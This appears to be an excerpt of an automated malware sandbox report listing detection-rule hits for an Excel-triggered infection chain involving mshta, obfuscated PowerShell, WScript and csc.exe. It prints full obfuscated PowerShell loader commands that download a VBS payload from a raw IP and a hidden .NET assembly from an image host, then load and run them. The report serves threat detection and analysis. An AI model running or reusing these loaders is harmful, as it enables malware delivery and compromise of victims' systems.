YWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFz
        Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3288, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatnicefeatureswithsupercodebnaturalthingsinlineforgiven[1].hta
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3736, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , ProcessId: 3988, ProcessName: wscript.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFz
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgI
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3288, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3580, ProcessName: mshta.exe
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3736, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , ProcessId: 3988, ProcessName: wscript.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3736, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline", ProcessId: 3896, ProcessName: csc.exe
        Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 170.82.173.30, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3288, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3736, TargetFilename: C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS
        Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3288, Protocol: tcp, SourceIp: 170.82.173.30, SourceIsIpv6: false, SourcePort: 443
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3736, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , ProcessId: 3988, ProcessName: wscript.exe
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3736, TargetFilename: C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline
        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3288, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
